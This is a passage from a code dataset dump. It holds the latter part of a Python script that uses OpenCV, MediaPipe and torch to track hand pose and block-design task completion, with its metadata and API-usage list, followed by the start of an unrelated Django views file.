\\\r\n # ( abs(pos_y[2] - pos_y[3]) < 100):\r\n\r\n # start = time.time()\r\n\r\n # >>>>>>>>>>>>\r\n\r\n len_0 = int (math.sqrt( (pos_x[0]-pos_x[1])**2 + (pos_y[0]-pos_y[1])**2 ) )\r\n len_1 = int (math.sqrt( (pos_x[1]-pos_x[2])**2 + (pos_y[1]-pos_y[2])**2 ) )\r\n len_2 = int (math.sqrt( (pos_x[2]-pos_x[3])**2 + (pos_y[2]-pos_y[3])**2 ) )\r\n len_3 = int (math.sqrt( (pos_x[3]-pos_x[0])**2 + (pos_y[3]-pos_y[0])**2 ) )\r\n len_4 = int (math.sqrt( (pos_x[0]-pos_x[2])**2 + (pos_y[0]-pos_y[2])**2 ) )\r\n len_5 = int (math.sqrt( (pos_x[1]-pos_x[3])**2 + (pos_y[1]-pos_y[3])**2 ) )\r\n\r\n # Order Len\r\n len_order = [ len_0, len_1, len_2, len_3, len_4, len_5 ]\r\n len_rect = sorted(len_order)\r\n\r\n if ( abs(len_rect[0] - len_rect[1]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[2] - len_rect[3]) < 50):\r\n\r\n # >>>>>>>>>>>>\r\n \r\n sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n for i in range(len(sort_index)):\r\n box_design_sort.append(box_design[sort_index[i]])\r\n \r\n print(\"----- TASK :\" + str(box_design_sort))\r\n\r\n if box_design_sort == ans_01:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_01)] = 0\r\n test_label += img_01\r\n task_state = 1\r\n \r\n if(timer_flag_01):\r\n end = time.time()\r\n timer_task_01 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_01)\r\n\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n timer_flag_01 = False\r\n else:\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_02:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_02)] = 0\r\n test_label += img_02\r\n task_state = 1\r\n \r\n if(timer_flag_02):\r\n end = time.time()\r\n timer_task_02 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_02)\r\n\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n timer_flag_02 = False\r\n else:\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_03:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_03)] = 0\r\n test_label += img_03\r\n task_state = 1\r\n\r\n if(timer_flag_03):\r\n end = time.time()\r\n timer_task_03 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_03)\r\n\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n timer_flag_03 = False\r\n else:\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_04:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_04)] = 0\r\n test_label += img_04\r\n task_state = 1\r\n \r\n if(timer_flag_04):\r\n end = time.time()\r\n timer_task_04 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_04)\r\n \r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n timer_flag_04 = False\r\n else:\r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_05:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_05)] = 0\r\n test_label += img_05\r\n task_state = 1\r\n \r\n if(timer_flag_05):\r\n end = time.time()\r\n timer_task_05 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_05)\r\n\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n timer_flag_05 = False\r\n else:\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_06:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_06)] = 0\r\n test_label += img_06\r\n task_state = 1\r\n \r\n if(timer_flag_06):\r\n end = time.time()\r\n timer_task_06 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_06)\r\n\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n timer_flag_06 = False\r\n else:\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_07:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_07)] = 0\r\n test_label += img_07\r\n task_state = 1\r\n \r\n if(timer_flag_07):\r\n end = time.time()\r\n timer_task_07 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_07)\r\n \r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n timer_flag_07 = False\r\n else:\r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_08:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_08)] = 0\r\n test_label += img_08\r\n task_state = 1\r\n \r\n if(timer_flag_08):\r\n end = time.time()\r\n timer_task_08 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_08)\r\n \r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n timer_flag_08 = False\r\n else:\r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n start = time.time()\r\n \r\n\r\n else:\r\n print (\"NOT COMPLETE\")\r\n\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n\r\n #cv2.imshow('Stream', frame)\r\n\r\n #else:\r\n # cv2.imshow('Stream', frame_next)\r\n \r\n #elif len(box_design) != 0 :\r\n #sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n #for i in range(len(sort_index)):\r\n # box_design_sort.append(box_design[sort_index[i]])\r\n \r\n # print(box_design) #_sort\r\n \r\n #else:\r\n # print(\"NOT DETECTED\")\r\n\r\n\r\n #print(str(n_frame) + \" processed\")\r\n #cv2.imshow('Stream', np.squeeze(results.render()))\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Put Text\r\n\r\n #cv2.putText(frame, \"Timer \", (150, 750), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2)\r\n #cv2.putText(frame, str(timer_task) + \" s\", (350, 750), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 5)\r\n\r\n #if(timer_flag_01 == False):\r\n # cv2.putText(frame, \"Task 1 : \" + str(timer_task_01) + \" s\", (150, 800), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_02 == False):\r\n # cv2.putText(frame, \"Task 2 : \" + str(timer_task_02) + \" s\", (150, 830), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_03 == False):\r\n # cv2.putText(frame, \"Task 3 : \" + str(timer_task_03) + \" s\", (150, 860), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_04 == False):\r\n # cv2.putText(frame, \"Task 4 : \" + str(timer_task_04) + \" s\", (150, 890), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_05 == False):\r\n # cv2.putText(frame, \"Task 5 : \" + str(timer_task_05) + \" s\", (150, 920), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_06 == False):\r\n # cv2.putText(frame, \"Task 6 : \" + str(timer_task_06) + \" s\", (150, 950), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_07 == False):\r\n # cv2.putText(frame, \"Task 7 : \" + str(timer_task_07) + \" s\", (150, 980), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_08 == False):\r\n # cv2.putText(frame, \"Task 8 : \" + str(timer_task_08) + \" s\", (150, 1010), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n \r\n cv2.imshow('Stream', frame)\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n writer_sta.writerow([ timer, timer_task, grasp_type, rotate_type, str(box_near_hand) ])\r\n\r\n #if (thumb_state == 1 or task_state == 1): # or thumb_state == -1\r\n # efficacy_state = 1\r\n #else:\r\n # efficacy_state = 0q\r\n\r\n if (hand_status == True):\r\n writer_ang.writerow([ timer, timer_task, \r\n angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2], task_state, thumb_state ])\r\n \r\n\r\n\r\n print( \"GRASP :\" + str(grasp_pose) + \" ; TIMER :\" + str(timer_task_all) )\r\n\r\n #n_contour = 0\r\n\r\n #else:\r\n #print(n_frame)\r\n #cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)\r\n\r\n #cv2.imshow('Stream', frame)\r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\n n_frame = n_frame + 1\r\n\r\n else:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "anom-tmu/bdt-multiscopic", "sub_path": "03_testing_uppertable.py", "file_name": "03_testing_uppertable.py", "file_ext": "py", "file_size_in_byte": 53667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.writer", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 71, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 72, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 73, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 102, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 104, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 105, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 225, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 228, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 239, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.multiply", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 287, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 288, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 291, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 296, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 317, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 319, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 320, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 323, "usage_type": "attribute"}, {"api_name": "torch.hub.load", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 362, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 364, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cv2.resizeWindow", "line_number": 365, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 367, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 367, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 368, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 369, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 370, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 370, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 371, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 372, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 382, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 383, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 383, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 384, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 385, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 385, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 386, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 386, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 387, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 387, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 389, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 389, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 390, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 390, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 391, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 391, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 392, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 392, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 393, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 393, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 394, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 394, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 399, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 400, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 403, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 406, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 407, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 409, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 410, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 410, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 411, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 411, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 412, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 412, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 413, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 414, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 414, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 415, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 415, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 416, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 416, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 417, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 417, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 418, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 418, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 420, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 420, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 421, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 421, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 422, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 422, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 423, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 423, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 424, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 424, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 425, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 425, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 426, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 426, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 427, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 427, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 428, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 428, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 429, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 429, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 471, "usage_type": "call"}, {"api_name": "time.time", "line_number": 472, "usage_type": "call"}, {"api_name": "time.time", "line_number": 499, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 515, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 515, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 523, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 523, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 588, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 590, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 591, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 605, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 656, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch_geometric.data.Data", "line_number": 664, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 671, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 672, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 675, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 675, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 679, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 679, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 683, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 683, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 687, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 687, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 691, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 691, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 695, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 695, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 701, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 701, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 705, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 705, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 720, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 722, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 722, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 726, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 755, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 756, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 756, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 757, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 757, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 796, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 803, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 803, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 828, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 834, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 842, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 842, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 849, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 852, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 861, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 864, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 887, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 888, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 889, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 890, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 891, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 892, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 917, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 918, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 919, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 920, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 921, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 922, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "time.time", "line_number": 951, "usage_type": "call"}, {"api_name": "time.time", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 964, "usage_type": "call"}, {"api_name": "time.time", "line_number": 969, "usage_type": "call"}, {"api_name": "time.time", "line_number": 977, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", "line_number": 987, "usage_type": "call"}, {"api_name": "time.time", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1000, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1005, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1013, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1018, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1023, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1031, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1036, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1041, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1049, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1054, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1067, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1072, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1077, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1085, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 1139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1141, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 1169, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 1178, "usage_type": "call"}]} +{"seq_id": "23596415074", "text": "import os\nfrom copy import deepcopy\n\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render\n\nfrom .cv import CV\n\n\ndef static_url(relative_path: str) -> str:\n return os.path.join(settings.STATIC_URL, relative_path)\n\n\nclass NavView(View):\n\n NAV_DEFAULT = {\n 'home': {\n 'label': 'Home',\n 